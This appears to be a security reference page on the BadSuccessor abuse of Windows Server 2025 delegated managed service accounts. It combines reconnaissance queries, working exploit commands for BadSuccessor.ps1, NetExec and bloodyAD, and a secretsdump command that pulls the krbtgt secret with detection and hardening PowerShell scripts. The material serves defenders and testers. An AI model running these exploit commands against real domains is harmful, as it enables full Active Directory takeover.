dMSA - Windows Server 2025 Delegated Managed Service Accounts (dMSAs) - BadSuccessor Exploit
Delegated Managed Service Accounts (dMSAs) are a new feature introduced in Windows Server 2025.
dMSAs are designed to streamline the management of service accounts by allowing a new dMSA to replace an older account and inherit its permissions: once the migration is marked as complete, tickets issued to the dMSA carry the superseded account's identity and group memberships.
BadSuccessor
Attackers can simulate this migration by modifying just two attributes on a dMSA object they control: msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState. Setting the first to the DN of a target user and the second to 2 (migration completed) makes the KDC believe a legitimate migration took place.
From then on the dMSA's TGT carries the target's SIDs, so the attacker automatically holds all the permissions of the targeted user, up to and including Domain Admins. Crucially, the attack needs no rights on the targeted account itself; the only requirement is the ability to create a dMSA (CreateChild on an OU or container) or to write to an existing one.
Detection
Requirements: at least one Windows Server 2025 DC (so the forest schema has the dMSA class) + CreateChild on any OU or container (GenericAll, WriteDACL or ownership of the OU work just as well, since they let you grant yourself CreateChild). A KDS root key must also exist, otherwise no dMSA password can be derived.
Windows Server 2025
Verify whether the DC is Windows Server 2025 (primaryGroupID 516 = Domain Controllers; check the operatingSystem attribute)
LDAPSearch
ldapsearch "(&(objectClass=computer)(primaryGroupID=516))" dn,name,operatingsystem
BloodHound Cypher Query
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectsid ENDS WITH '-516' WITH COLLECT(c1.name) AS dcs MATCH (c2:Computer) WHERE c2.enabled = true AND (c2.operatingsystem CONTAINS '2025') AND (c2.name IN dcs) RETURN c2.name
https://x.com/badsectorlabs/status/1925229491607023702
MATCH (c:Computer)
WHERE c.isdc = true AND c.operatingsystem CONTAINS "2025"
RETURN c.name
CreateChild permission on any OU
BloodHound
MATCH (u:User {name: "USERNAME@DOMAIN.LOCAL"})-[r]->(ou:OU)
RETURN type(r) AS edge_type, r.rightname AS permission, ou.name AS organizational_unit
PowerView
Get-DomainObjectACL -Identity "OU=GroupName,DC=DOMAIN,DC=local" -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match 'CreateChild|GenericAll' } | Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, @{n='Identity'; e={ ConvertFrom-SID $_.SecurityIdentifier }} | Where-Object { $_.Identity -match 'username' }
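The same check for one principal across every OU and container in the domain, as an added PowerShell example (not from the page, PowerView or BadSuccessor.ps1). It goes a step further than the one-OU queries above: it expands nested group membership through tokenGroups, accepts CreateChild that is either unrestricted or scoped to the dMSA class, and also reports OUs the principal owns, because implicit owner rights let the owner rewrite the DACL. The principal name is an assumption.

```powershell
# Added example: where can $Principal create dMSAs? Assumed principal name.
Import-Module ActiveDirectory
$Principal = 'j.taylor'   # assumed low-privileged account to test

function Get-BadSuccessorCandidates {
    param([string]$Principal)

    # The dMSA class exists only in a schema extended for Server 2025. No class, no BadSuccessor.
    $cls = Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext `
        -LDAPFilter '(lDAPDisplayName=msDS-DelegatedManagedServiceAccount)' -Properties schemaIDGUID
    if (-not $cls) { Write-Warning 'No msDS-DelegatedManagedServiceAccount class in schema: forest not prepared for Server 2025'; return }
    $dmsaClass = [guid]::new([byte[]]$cls.schemaIDGUID)

    # SIDs the principal carries in its token: itself, nested groups (tokenGroups is
    # recursive) and the well-known identities every authenticated user has.
    $acct = Get-ADUser -Identity $Principal -Properties tokenGroups
    $sids = @($acct.SID.Value) + @($acct.tokenGroups | ForEach-Object { $_.Value }) + @('S-1-1-0', 'S-1-5-11')

    # GenericAll (0xF01FF) includes the CreateChild bit, so one mask test covers both.
    $createChild = [System.DirectoryServices.ActiveDirectoryRights]::CreateChild

    Get-ADObject -LDAPFilter '(|(objectClass=organizationalUnit)(objectClass=container))' |
    ForEach-Object {
        $dn  = $_.DistinguishedName
        $acl = Get-Acl -Path "AD:\$dn"

        # Ownership is as good as CreateChild while implicit owner rights are enabled.
        try { $ownerSid = $acl.GetOwner([System.Security.Principal.SecurityIdentifier]).Value } catch { $ownerSid = $null }
        if ($ownerSid -in $sids) {
            [pscustomobject]@{ Container = $dn; Via = 'Owner'; Right = 'implicit WriteDACL'; Scope = 'n/a' }
        }

        foreach ($ace in $acl.Access) {                      # includes inherited ACEs
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.ActiveDirectoryRights -band $createChild) -ne $createChild) { continue }
            try { $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
            if ($aceSid -notin $sids) { continue }
            # Empty ObjectType = any child class; otherwise it must be the dMSA class itself.
            if ($ace.ObjectType -ne [guid]::Empty -and $ace.ObjectType -ne $dmsaClass) { continue }
            [pscustomobject]@{
                Container = $dn
                Via       = $ace.IdentityReference.Value
                Right     = $ace.ActiveDirectoryRights
                Scope     = if ($ace.ObjectType -eq [guid]::Empty) { 'all child classes' } else { 'msDS-DelegatedManagedServiceAccount only' }
            }
        }
    }
}

Get-BadSuccessorCandidates -Principal $Principal | Format-Table -AutoSize
```

The function only looks at Allow ACEs; a matching Deny ACE on the same container would still win, so treat each hit as a candidate to confirm with an actual New-ADObject attempt rather than as proof.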
BadSuccessor.ps1
BadSuccessor -mode check -Domain evilcorp.local

BadSuccessor -mode exploit -Path "CN=Users,DC=otrf,DC=local" -Name "sus_dMSA" -DelegatedAdmin "j.taylor" -DelegateTarget "svcAccount06" -domain "otrf.local"
BadSuccessor
-mode check identifies which identities have permissions to create dMSAs in the domain and which OUs are affected, i.e. where the BadSuccessor attack could be executed
Proof of Concept (PoC)
NetExec
nxc ldap [IP] -u administrator -p password -M badsuccessor

https://x.com/mpgn_x64/status/1925935365744951350
Tools
Rubeus - C# (asktgs with the /dmsa option requests the TGT of a prepared dMSA; the PAC carries the predecessor's SIDs)
SharpSuccessor - .NET
BadSuccessor - PowerShell
PowerView.py dev branch - Python
BadSuccessor - Python
BloodyAD - Python
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' get writable --otype OU --right CHILD
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' get writable --otype OU
$ python bloodyAD.py --host 192.168.100.5 -d bloody.corp -u jeanne -p 'Password123!' add badSuccessor dmsADM10
$ export KRB5CCNAME=dmsADM10_wT.ccache
$ secretsdump.py 'bloody.corp/dmsADM10$@DC2025.bloody.corp' -k -no-pass -just-dc-user 'bloody\krbtgt' -dc-ip 192.168.100.5 -target-ip 192.168.100.5
Mitigation
Set deny ACEs on OUs to prevent dMSA abuse: deny CreateChild for msDS-DelegatedManagedServiceAccount objects on every OU and container where non-admins hold CreateChild, and deny WriteProperty on msDS-ManagedAccountPrecededByLink and msDS-DelegatedMSAState on existing dMSAs (the three writes the attack needs).
Disable implicit owner rights: the creator of an object becomes its owner, and an owner can rewrite the object's DACL without holding an explicit ACE, so anyone who can create a dMSA can also widen its ACL unless implicit owner rights are blocked.
Don't have a KDS Root Key until you need one: dMSA (and gMSA) passwords are derived from the KDS root key, so without one no password can be derived for a rogue dMSA. Check with Get-KdsRootKey and audit who is able to create one.
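The three mitigations above as one added PowerShell example (not from the page or from any vendor guidance): an audit of dMSAs that claim a finished migration, a function that adds the deny ACEs for the three writes the attack needs, and a KDS root key check. Schema GUIDs are resolved at run time instead of being hardcoded. The OU and the SID in the commented usage line are assumptions.

```powershell
# Added example: audit, harden and prerequisite check for BadSuccessor.
Import-Module ActiveDirectory

function Get-SchemaGuid([string]$LdapDisplayName) {
    # Resolve a class/attribute schemaIDGUID from the schema partition at run time.
    $o = Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext `
        -LDAPFilter "(lDAPDisplayName=$LdapDisplayName)" -Properties schemaIDGUID
    if (-not $o) { throw "$LdapDisplayName is not in the schema (forest not prepared for Server 2025?)" }
    [guid]::new([byte[]]$o.schemaIDGUID)
}

# 1. Audit. State 2 means "migration completed"; every such dMSA must match a real
#    migration. A link to an adminCount=1 account nobody migrated is BadSuccessor.
function Get-SuspiciousDmsa {
    Get-ADObject -LDAPFilter '(&(objectClass=msDS-DelegatedManagedServiceAccount)(msDS-DelegatedMSAState=2))' `
        -Properties 'msDS-ManagedAccountPrecededByLink', 'msDS-GroupMSAMembership', 'whenCreated' |
    ForEach-Object {
        $link = $_.'msDS-ManagedAccountPrecededByLink'
        $pred = if ($link) { Get-ADObject -Identity $link -Properties adminCount } else { $null }
        [pscustomobject]@{
            Dmsa               = $_.DistinguishedName
            Created            = $_.whenCreated
            Predecessor        = $pred.DistinguishedName
            PredecessorIsAdmin = ($pred.adminCount -eq 1)
            # Who may request the dMSA's credentials (DACL of msDS-GroupMSAMembership)
            CanRetrieve        = ($_.'msDS-GroupMSAMembership'.Access.IdentityReference.Value -join ', ')
        }
    }
}

# 2. Harden. Deny (a) creating dMSA objects under the OU and (b)/(c) writing the two
#    migration attributes on any dMSA below it, for the given SID.
function Protect-OuFromBadSuccessor {
    param([string]$Ou, [string]$DenySid)
    $id   = [System.Security.Principal.SecurityIdentifier]$DenySid
    $dmsa = Get-SchemaGuid 'msDS-DelegatedManagedServiceAccount'
    $deny = [System.Security.AccessControl.AccessControlType]::Deny
    $acl  = Get-Acl -Path "AD:\$Ou"
    # (a) CreateChild, scoped to the dMSA class, on this OU and everything below it
    $acl.AddAccessRule([System.DirectoryServices.ActiveDirectoryAccessRule]::new(
        $id, [System.DirectoryServices.ActiveDirectoryRights]::CreateChild, $deny, $dmsa,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All))
    # (b)/(c) WriteProperty on the two attributes, inherited only by dMSA objects
    foreach ($attr in 'msDS-ManagedAccountPrecededByLink', 'msDS-DelegatedMSAState') {
        $acl.AddAccessRule([System.DirectoryServices.ActiveDirectoryAccessRule]::new(
            $id, [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty, $deny, (Get-SchemaGuid $attr),
            [System.DirectoryServices.ActiveDirectorySecurityInheritance]::Descendents, $dmsa))
    }
    Set-Acl -Path "AD:\$Ou" -AclObject $acl
}

# 3. Prerequisite. dMSA passwords come from the KDS root key; without one no rogue dMSA
#    can get a usable credential. If one exists, the ACEs above are the control.
function Test-KdsRootKey {
    $k = Get-KdsRootKey
    if ($k) { $k | Select-Object KeyId, CreationTime, EffectiveTime } else { 'No KDS root key in this forest' }
}

Get-SuspiciousDmsa | Format-Table -AutoSize
Test-KdsRootKey
# Protect-OuFromBadSuccessor -Ou 'OU=Workstations,DC=corp,DC=local' -DenySid 'S-1-5-11'   # assumed OU; S-1-5-11 = Authenticated Users
```

Two caveats. A Deny ACE wins over every Allow, so denying Authenticated Users also blocks legitimate dMSA provisioning in that OU by admins; scope the SID, or keep admin provisioning in a separate OU. And ACE (a) is the one that stops the attack: an attacker sets both migration attributes in the same create request, which is only checked against CreateChild, so (b)/(c) matter for dMSAs the attacker can write to but did not create.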